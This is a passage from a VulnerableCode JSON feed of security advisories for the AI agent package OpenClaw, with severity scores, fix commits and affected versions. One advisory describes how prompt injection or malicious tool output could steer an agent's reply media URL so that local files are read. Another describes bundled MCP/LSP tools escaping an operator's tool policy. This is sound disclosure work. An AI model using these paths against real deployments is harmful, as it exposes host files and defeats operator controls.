"VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41393", "GHSA-q9w8-cf67-r238" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g3hg-peh1-tudm" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89500?format=api", "vulnerability_id": "VCID-g8r6-x6s5-uydq", "summary": "OpenClaw: Telegram audio preflight transcription enables resource consumption by unauthorized senders\n## Summary\nTelegram audio preflight transcription enables resource consumption by unauthorized senders\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: v2026.3.28 still lets unauthorized Telegram group senders trigger audio preflight before allowlist enforcement, but the real impact is resource or billing burn rather than direct data exposure or host compromise.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `c4fa8635d03943ffe9e294d501089521dca635c5` — 2026-03-30T12:19:31+01:00\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41331", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.1772", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17683", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00056", "scoring_system": "epss", "scoring_elements": "0.17714", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41331" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/c4fa8635d03943ffe9e294d501089521dca635c5", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-21T12:59:50Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/c4fa8635d03943ffe9e294d501089521dca635c5" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-m6fx-m8hc-572m", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-21T12:59:50Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-m6fx-m8hc-572m" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41331", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41331" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-unauthorized-telegram-audio-preflight-transcription", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-21T12:59:50Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-resource-consumption-via-unauthorized-telegram-audio-preflight-transcription" }, { "reference_url": "https://github.com/advisories/GHSA-m6fx-m8hc-572m", "reference_id": "GHSA-m6fx-m8hc-572m", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-m6fx-m8hc-572m" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41331", "GHSA-m6fx-m8hc-572m" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-g8r6-x6s5-uydq" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89007?format=api", "vulnerability_id": "VCID-gk95-28x9-17dk", "summary": "OpenClaw: Webchat audio embedding could read local files without local-root containment\n## Impact\n\nOpenClaw deployments before `2026.4.15` could embed host-local audio files into webchat responses without applying the local media root containment check used by other media-serving paths.\n\nIf an attacker could influence an agent or tool-produced `ReplyPayload.mediaUrl`, the webchat audio embedding helper could resolve an absolute local path or `file:` URL, read an audio-like file under the size cap, and base64-encode it into the webchat media response. This crossed the model/tool-output boundary into a host file read. Prompt injection or malicious tool output is a delivery mechanism; the security boundary failure is the missing local-root containment check.\n\nThe impact is narrow: the file had to be readable by the gateway process, have an audio-like extension, and fit within the webchat audio size cap. The issue exposed contents into the webchat assistant/media transcript path; it was not a general remote filesystem API.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` on npm\n- Affected versions: `<= 2026.4.14`\n- Patched version: `2026.4.15`\n\nThe latest public release, `2026.4.21`, also contains the fix.\n\n## Patches\n\nThe public fix threads the applicable local media roots into the webchat audio embedding path and calls `assertLocalMediaAllowed` before local audio content is read. Current `main` also includes an additional `trustedLocalMedia` gate so untrusted model/tool payloads cannot opt into local audio embedding.\n\nFix commit:\n\n- `6e58f1f9f54bca1fea1268ec0ee4c01a2af03dde`\n\n## Workarounds\n\nUpgrade to `openclaw@2026.4.15` or later. The latest public release, `2026.4.21`, is fixed. Before upgrading, avoid exposing webchat sessions to untrusted prompt/tool content that can influence reply media URLs.\n\n## Credits\n\nOpenClaw thanks @zsxsoft for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/6e58f1f9f54bca1fea1268ec0ee4c01a2af03dde", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/6e58f1f9f54bca1fea1268ec0ee4c01a2af03dde" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gfg9-5357-hv4c", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.0", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-gfg9-5357-hv4c" }, { "reference_url": "https://github.com/advisories/GHSA-gfg9-5357-hv4c", "reference_id": "GHSA-gfg9-5357-hv4c", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-gfg9-5357-hv4c" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109881?format=api", "purl": "pkg:npm/openclaw@2026.4.15", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.15" } ], "aliases": [ "GHSA-gfg9-5357-hv4c" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gk95-28x9-17dk" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89411?format=api", "vulnerability_id": "VCID-gkyv-ahk7-1ud3", "summary": "OpenClaw: Bundled MCP/LSP tools could bypass configured tool policy\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nBundled MCP and LSP tools could be appended to the agent's effective tool set after the normal tool-policy pipeline had already filtered core tools. If an operator configured a restrictive policy, such as a tool profile, explicit allow/deny list, owner-only tool restriction, sandbox tool policy, or subagent tool policy, a bundled MCP/LSP tool could remain available even though the same policy would have denied it.\n\nThe issue required a configured bundled MCP or LSP tool source and an operator policy that should have restricted that tool. This was a local agent policy-enforcement bypass, not an unauthenticated remote gateway compromise. Severity is medium.\n\n## Fix\n\nOpenClaw now applies a final effective tool policy pass to bundled MCP/LSP tools before merging them into the tool set used by normal runs and compaction. The pass covers profile policy, provider profile policy, global/agent/group policies, owner-only filtering, sandbox tool policy, and subagent tool policy.\n\nFix commit:\n\n- `0e7a992d3f3155199c1acc2dd9a53c5b3a4d3ada`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/0e7a992d3f3155199c1acc2dd9a53c5b3a4d3ada", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/0e7a992d3f3155199c1acc2dd9a53c5b3a4d3ada" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qrp5-gfw2-gxv4", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "4.8", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qrp5-gfw2-gxv4" }, { "reference_url": "https://github.com/advisories/GHSA-qrp5-gfw2-gxv4", "reference_id": "GHSA-qrp5-gfw2-gxv4", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-qrp5-gfw2-gxv4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109923?format=api", "purl": "pkg:npm/openclaw@2026.4.20", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20" } ], "aliases": [ "GHSA-qrp5-gfw2-gxv4" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gkyv-ahk7-1ud3" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91842?format=api", "vulnerability_id": "VCID-gvam-2net-8kc5", "summary": "OpenClaw's device removal and token revocation do not terminate active WebSocket sessions\n## Summary\n\nRemoving a device or revoking its token updated stored credentials but did not disconnect already-authenticated WebSocket sessions.\n\n## Impact\n\nA revoked device could continue using its existing live session until reconnect, extending access beyond credential removal.\n\n## Affected Component\n\n`src/gateway/server-methods/devices.ts, src/gateway/server.impl.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `7a801cc451` (`Gateway: disconnect revoked device sessions`).\n\nOpenClaw thanks @AntAISecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34503", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01851", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01855", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00014", "scoring_system": "epss", "scoring_elements": "0.02731", "published_at": "2026-06-07T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-34503" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/7a801cc451e9e667b705eeccff651923a1b8c863", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T15:12:24Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/7a801cc451e9e667b705eeccff651923a1b8c863" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2pr2-hcv6-7gwv", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T15:12:24Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-2pr2-hcv6-7gwv" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34503", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34503" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-on-device-removal-and-token-revocation", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" }, { "value": "8.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N" }, { "value": "8.6", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T15:12:24Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-on-device-removal-and-token-revocation" }, { "reference_url": "https://github.com/advisories/GHSA-2pr2-hcv6-7gwv", "reference_id": "GHSA-2pr2-hcv6-7gwv", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-2pr2-hcv6-7gwv" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { 